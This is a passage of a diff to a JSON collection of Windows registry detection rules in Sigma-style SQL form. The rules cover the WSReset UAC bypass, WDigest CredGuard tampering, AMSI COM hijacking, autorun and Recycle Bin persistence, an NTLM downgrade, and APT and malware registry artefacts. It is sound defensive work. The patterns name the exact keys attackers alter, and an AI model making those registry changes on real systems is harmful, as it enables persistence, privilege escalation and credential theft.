"Changing RDP Port to Non Standard Number", - "id": "509e84b9-a71a-40e0-834f-05470369bd1e", + "title": "Pandemic Registry Key", + "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", "status": "test", - "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", - "author": "frack113", + "description": "Detects Pandemic Windows Implant", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.010" + "attack.lateral_movement", + "attack.t1105" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" + ], + "filename": "registry_event_apt_pandemic.yml" + }, + { + "title": "UAC Bypass Via Wsreset", + "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "status": "test", + "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. 
It will run a binary file contained in a low-privilege registry.", + "author": "oscd.community, Dmitry Uchakin", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (NewValue = 'DWORD (0x00000d3d)'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "registry_set_change_rdp_port.yml" + "filename": "registry_event_bypass_via_wsreset.yml" }, { - "title": "Common Autorun Keys Modification", - "id": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", + "title": "Wdigest CredGuard Registry Modification", + "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", + "status": "test", + "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" + ], + "filename": 
"registry_event_disable_wdigest_credential_guard.yml" + }, + { + "title": "Registry Persistence Mechanisms in Recycle Bin", + "id": "277efb8f-60be-4f10-b4d3-037802f37167", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", + "description": "Detects persistence registry keys for Recycle Bin", + "author": "frack113", "tags": [ "attack.persistence", - "attack.t1547.001" + "attack.t1547" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows CE Services\\\\AutoStart%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\Setup\\\\CmdLine%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Ctf\\\\LangBarAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Handler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Htmlfile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Environment\\\\UserInitMprLogonScript%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\UrlSearchHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Desktop\\\\Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Classes\\\\Clsid\\\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\\\Inprocserver32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRunStore\\\\HKMU\\\\SOFTWARE\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\') OR NewValue IN ('{314111c7-a502-11d2-bbca-00c04f8ec294}', '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}', '{42089D2D-912D-4018-9087-2B87803E93FB}', '{5504BE45-A83B-4808-900A-3A5C36E7F77A}', '{807583E5-5146-11D5-A672-00B0D022E945}')) OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{8A69D345-D564-463c-AFF1-A69D9E530F96}\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{89820200-ECBD-11cf-8B85-00AA005B4383}\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files 
(x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_common.yml" + "filename": "registry_event_persistence_recycle_bin.yml" }, { - "title": "WinSock2 Autorun Keys Modification", - "id": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", + "title": "OceanLotus Registry Activity", + "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", + "author": "megan201296, Jonhnathan Ribeiro", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType 
LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WinSock2\\\\Parameters%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Protocol\\_Catalog9\\\\Catalog\\_Entries%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NameSpace\\_Catalog5\\\\Catalog\\_Entries%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\MsiExec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" ], - "filename": "registry_set_asep_reg_keys_modification_winsock2.yml" + "filename": "registry_event_apt_oceanlotus_registry.yml" }, { - "title": "New Root or CA or AuthRoot Certificate to Store", - "id": 
"d223b46b-5621-4037-88fe-fda32eead684", - "status": "experimental", - "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", - "author": "frack113", + "title": "FlowCloud Malware", + "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", + "status": "test", + "description": "Detects FlowCloud malware from threat group TA410.", + "author": "NVISO", "tags": [ - "attack.impact", - "attack.t1490" + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Blob' ESCAPE '\\' AND NewValue = 'Binary Data')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing 
registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_install_root_or_ca_certificat.yml" + "filename": "registry_event_mal_flowcloud.yml" }, { - "title": "IE Change Domain Zone", - "id": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", - "status": "experimental", - "description": "Hides the file extension through modification of the registry", - "author": "frack113", + "title": "Office Application Startup - Office Test", + "id": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", + "status": "test", + "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", + "author": "omkar72", "tags": [ "attack.persistence", - "attack.t1137" + "attack.t1137.002" ], "falsepositives": [ - "Administrative scripts" + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Domains\\\\%' ESCAPE '\\') AND NOT (NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', '(Empty)')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE 
'\\'))" ], - "filename": "registry_set_change_security_zones.yml" + "filename": "registry_event_office_test_regadd.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits", - "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", - "status": "experimental", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S, frack113", + "title": "NetNTLM Downgrade Attack - Registry", + "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "status": "test", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((NewValue LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR NewValue LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" ], - "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "registry_event_net_ntlm_downgrade.yml" }, { - "title": "Potential AutoLogger Sessions Tampering", - "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", + "title": "HybridConnectionManager Service Installation - Registry", + "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", "status": "experimental", - "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion" + "attack.resource_development", + "attack.t1608" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND NewValue LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" ], - "filename": 
"registry_set_disable_autologger_sessions.yml" + "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" }, { - "title": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)", - "id": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", + "title": "Run Once Task Configuration in Registry", + "id": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", "status": "test", - "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", - "author": "Sittikorn S", + "description": "Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup", + "author": "Avneet Singh @v3t0_, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1221" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate modification of the registry key by legitimate program" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKCR\\\\ms-msdt\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' AND TargetObject LIKE '%\\\\StubPath' ESCAPE '\\') AND NOT ((NewValue LIKE '\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\Installer\\\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level%' ESCAPE '\\') OR ((NewValue LIKE '\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' OR NewValue LIKE '\"C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\') AND NewValue LIKE '%\\\\Installer\\\\setup.exe\" --configure-user-settings --verbose-logging 
--system-level --msedge --channel=stable' ESCAPE '\\')))" ], - "filename": "registry_set_cve_2022_30190_msdt_follina.yml" + "filename": "registry_event_runonce_persistence.yml" }, { - "title": "Potential AMSI COM Server Hijacking", - "id": "160d2780-31f7-4922-8b3a-efce30e63e96", - "status": "experimental", - "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Path To Screensaver Binary Modified", + "id": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", + "status": "test", + "description": "Detects value modification of registry key containing path to binary used as screensaver.", + "author": "Bartlomiej Czyz @bczyz1, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.002" ], "falsepositives": [ - "Unknown" + "Legitimate modification of screensaver" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE 
'\\')))" ], - "filename": "registry_set_amsi_com_hijack.yml" + "filename": "registry_event_modify_screensaver_binary_path.yml" }, { - "title": "Potential Persistence Via Excel Add-in - Registry", - "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", + "title": "Potential Ransomware Activity Using LegalNotice Message", + "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", "status": "experimental", - "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.impact", + "attack.t1491.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND NewValue LIKE '/R %' ESCAPE '\\' AND NewValue LIKE '%.xll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (NewValue LIKE '%encrypted%' ESCAPE '\\' OR NewValue LIKE '%Unlock-Password%' ESCAPE '\\' OR NewValue LIKE '%paying%' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_xll.yml" + "filename": "registry_set_legalnotice_susp_message.yml" }, { - "title": "Disable 
Administrative Share Creation at Startup", - "id": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", + "title": "Windows Credential Editor Registry", + "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", "status": "test", - "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", - "author": "frack113", + "description": "Detects the use of Windows Credential Editor (WCE)", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" + ], + "filename": "registry_event_hack_wce_reg.yml" + }, + { + "title": "PortProxy Registry Key", + "id": "a54f842a-3713-4b45-8c84-5f136fdebd3c", + "status": "test", + "description": "Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.lateral_movement", "attack.defense_evasion", - "attack.t1070.005" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. 
https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", + "Synergy Software KVM (https://symless.com/synergy)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%AutoShareWks' ESCAPE '\\' OR TargetObject LIKE '%AutoShareServer' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\PortProxy\\\\v4tov4\\\\tcp' ESCAPE '\\')" ], - "filename": "registry_set_disable_administrative_share.yml" + "filename": "registry_event_portproxy_registry_key.yml" }, { - "title": "Tamper With Sophos AV Registry Keys", - "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", - "status": "experimental", - "description": "Detects tamper attempts to sophos av functionality via registry key modification", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Security Support Provider (SSP) Added to LSA Configuration", + "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "status": "test", + "description": "Detects the addition of a SSP to the registry. 
